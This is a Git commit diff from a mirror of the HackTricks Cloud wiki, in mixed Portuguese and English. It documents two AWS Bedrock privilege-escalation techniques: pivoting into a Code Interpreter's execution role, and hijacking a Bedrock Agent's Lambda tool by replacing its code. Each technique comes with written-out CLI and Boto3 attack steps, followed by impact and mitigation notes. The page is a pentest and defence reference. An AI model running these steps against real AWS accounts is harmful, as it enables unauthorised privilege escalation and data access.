gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-04-28 12:03:08 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/aws-security/aws-privilege-escalat

Browse Source
This commit is contained in:
Translator
2026-04-21 08:21:07 +00:00
parent 411e09f8ee
commit 6c6c8c8314
1 changed files with 96 additions and 27 deletions
Download Patch File Download Diff File Expand all files Collapse all files

123
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
View File

@@ -6,32 +6,32 @@
### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot ### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
AgentCore Code Interpreter é um ambiente de execução gerenciado. **Custom Code Interpreters** podem ser configurados com um **`executionRoleArn`** que “provides permissions for the code interpreter to access AWS services”. AgentCore Code Interpreter é um ambiente de execução gerenciado. **Custom Code Interpreters** podem ser configurados com um **`executionRoleArn`** que “fornece permissões para que o code interpreter acesse serviços AWS”.
Se um **principal IAM com privilégios mais baixos** puder **start + invoke** uma sessão do Code Interpreter configurada com uma **execution role** mais privilegiada, o chamador pode efetivamente **pivot into the execution roles permissions** (lateral movement / privilege escalation dependendo do escopo da role). Se um **principal IAM com menos privilégios** conseguir **iniciar + invocar** uma sessão de Code Interpreter configurada com um **execution role mais privilegiado**, o chamador pode efetivamente **pivotar para as permissões do execution role** (lateral movement / privilege escalation dependendo do escopo da role).
> [!NOTE] > [!NOTE]
> Isto tipicamente é um problema de **misconfiguration / excessive permissions** (concessão de permissões amplas à interpreter execution role e/ou concessão de amplo invoke access). > Isso normalmente é um problema de **misconfiguration / permissões excessivas** (conceder permissões amplas à role de execução do interpreter e/ou conceder acesso amplo de invoke).
> A AWS alerta explicitamente para evitar privilege escalation garantindo que execution roles tenham **equal or fewer** privilégios do que as identidades autorizadas a invoke. > A AWS avisa explicitamente para evitar privilege escalation garantindo que as execution roles tenham privilégios **iguais ou menores** do que as identidades autorizadas a invocar.
#### Pré-condições (misconfiguration comum) #### Precondições (misconfiguration comum)
- Existe um **custom code interpreter** com uma **execution role** excessivamente privilegiada (ex: acesso a S3/Secrets/SSM sensíveis ou capacidades tipo IAM-admin). - Existe um **custom code interpreter** com uma **execution role** com privilégios excessivos (ex: acesso a S3/Secrets/SSM sensíveis ou capacidades parecidas com IAM-admin).
- Um usuário (developer/auditor/CI identity) possui permissões para: - Um usuário (developer/auditor/identidade de CI) tem permissões para:
- start sessions: `bedrock-agentcore:StartCodeInterpreterSession` - iniciar sessions: `bedrock-agentcore:StartCodeInterpreterSession`
- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter` - invocar tools: `bedrock-agentcore:InvokeCodeInterpreter`
- (Opcional) O usuário também pode criar interpreters: `bedrock-agentcore:CreateCodeInterpreter` (permite criar um novo interpreter configurado com uma execution role, dependendo dos guardrails da organização). - (Opcional) O usuário também pode criar interpreters: `bedrock-agentcore:CreateCodeInterpreter` (permite criar um novo interpreter configurado com uma execution role, dependendo das guardrails da organização).
#### Recon (identify custom interpreters and execution role usage) #### Recon (identificar custom interpreters e uso da execution role)
Liste interpreters (control-plane) e inspecione sua configuração: Liste interpreters (control-plane) e inspecione sua configuração:
```bash ```bash
aws bedrock-agentcore-control list-code-interpreters aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID> aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
```` ```
> O comando create-code-interpreter suporta `--execution-role-arn` que define quais permissões da AWS o interpretador terá. > O comando create-code-interpreter suporta `--execution-role-arn`, que define quais permissões AWS o interpreter terá.
#### Passo 1 - Iniciar uma sessão (isso retorna um `sessionId`, não um shell interativo) #### Step 1 - Start a session (isso retorna um `sessionId`, não um shell interativo)
```bash ```bash
SESSION_ID=$( SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \ aws bedrock-agentcore start-code-interpreter-session \
@@ -43,11 +43,11 @@ aws bedrock-agentcore start-code-interpreter-session \
echo "SessionId: $SESSION_ID" echo "SessionId: $SESSION_ID"
``` ```
#### Etapa 2 - Invocar execução de código (Boto3 ou HTTPS assinada) #### Step 2 - Invoke code execution (Boto3 or signed HTTPS)
Não existe **um shell python interativo** a partir de `start-code-interpreter-session`. A execução acontece via **InvokeCodeInterpreter**. Não **interactive python shell** de `start-code-interpreter-session`. A execução acontece via **InvokeCodeInterpreter**.
**Opção A - Exemplo Boto3 (executar Python + verificar identidade):** **Option A - Boto3 example (execute Python + verify identity):**
```python ```python
import boto3 import boto3
@@ -68,9 +68,9 @@ arguments={
for event in resp.get("stream", []): for event in resp.get("stream", []):
print(event) print(event)
``` ```
Se o interpreter estiver configurado com um execution role, a saída de `sts:GetCallerIdentity()` deve refletir a identidade desse role (não do low-priv caller), demonstrando o pivot. Se o interpreter estiver configurado com uma execution role, a saída de `sts:GetCallerIdentity()` deve refletir a identidade dessa role (não a do low-priv caller), demonstrando o pivot.
**Opção B - Chamada HTTPS assinada (awscurl):** **Option B - Signed HTTPS call (awscurl):**
```bash ```bash
awscurl -X POST \ awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \ "https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
@@ -87,18 +87,86 @@ awscurl -X POST \
} }
}' }'
``` ```
#### Impact
* **Lateral movement** para qualquer acesso AWS que a role de execução do interpreter tenha.
* **Privilege escalation** se a role de execução do interpreter for mais privilegiada do que o caller.
* Detecção mais difícil se os CloudTrail data events para invocações do interpreter não estiverem habilitados (as invocações podem não ser registradas por padrão, dependendo da configuração).
#### Mitigations / Hardening
* **Least privilege** no `executionRoleArn` do interpreter (trate isso como Lambda execution roles / CI roles).
* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) e quem pode iniciar sessions.
* Use **SCPs** para negar InvokeCodeInterpreter exceto para approved agent runtime roles (a aplicação em nível de org pode ser necessária).
* Habilite os CloudTrail data events apropriados para AgentCore quando aplicável; gere alertas para invocações inesperadas e criação de sessions.
## Amazon Bedrock Agents
### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
Bedrock Agents podem usar **Lambda-backed action groups** como tools (external execution). Se um principal puder **modificar o code de uma função Lambda usada por um agent**, e depois puder **invocar o agent**, ele pode executar code controlado pelo attacker sob a **Lambda execution role**.
> [!NOTE]
> Isto é um **cross-service trust abuse** (Bedrock → Lambda), não uma vulnerabilidade. O attacker pode não conseguir invocar a Lambda diretamente, mas ainda pode acioná-la via o agent.
#### Preconditions (common misconfiguration)
- Existe um Bedrock Agent com um **action group backed by a Lambda function**
- O attacker tem:
- `lambda:UpdateFunctionCode`
- `bedrock:InvokeAgent`
- A Lambda execution role tem permissões mais amplas do que o attacker
- O attacker consegue identificar a Lambda usada pelo agent
#### Recon
Enumerate agent action groups:
```bash
aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
```
Inspecionar Lambda:
```bash
aws lambda get-function --function-name <FUNCTION_NAME>
```
#### Exploitation
Substitua o código Lambda:
```bash
zip payload.zip lambda_function.py
aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip
```
Example payload:
```python
import boto3
def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()
```
Disparar via agent:
```bash
aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"
```
#### Impacto #### Impacto
* **Lateral movement** para qualquer acesso AWS que a função de execução do interpreter possuir. * **Escalada de privilégios** para a Lambda execution role
* **Privilege escalation** se a função de execução do interpreter tiver mais privilégios que o chamador. * **Exfiltração de dados** de AWS services
* Detecção mais difícil se os **CloudTrail data events** para invocações do interpreter não estiverem habilitados (as invocações podem não ser registradas por padrão, dependendo da configuração). * **Abuso entre services** via trusted agent execution
#### Mitigações / Fortalecimento #### Mitigações
* **Least privilege** no interpreter `executionRoleArn` (trate-o como Lambda execution roles / CI roles). * **Restrinja** `lambda:UpdateFunctionCode`
* **Restrinja quem pode invocar** (`bedrock-agentcore:InvokeCodeInterpreter`) e quem pode iniciar sessões. * Use Lambda roles com **least-privilege**
* Use **SCPs** para negar InvokeCodeInterpreter exceto para agent runtime roles aprovados (a aplicação a nível da organização pode ser necessária). * **Monitore** mudanças no código da Lambda
* Habilite os apropriados **CloudTrail data events** para AgentCore quando aplicável; alerte sobre invocações inesperadas e criação de sessões. * **Audite** o uso de tools do Bedrock agent
## Referências ## Referências
@@ -108,6 +176,7 @@ awscurl -X POST \
- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) - [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html) - [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html) - [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
{{#include ../../../../banners/hacktricks-training.md}} {{#include ../../../../banners/hacktricks-training.md}}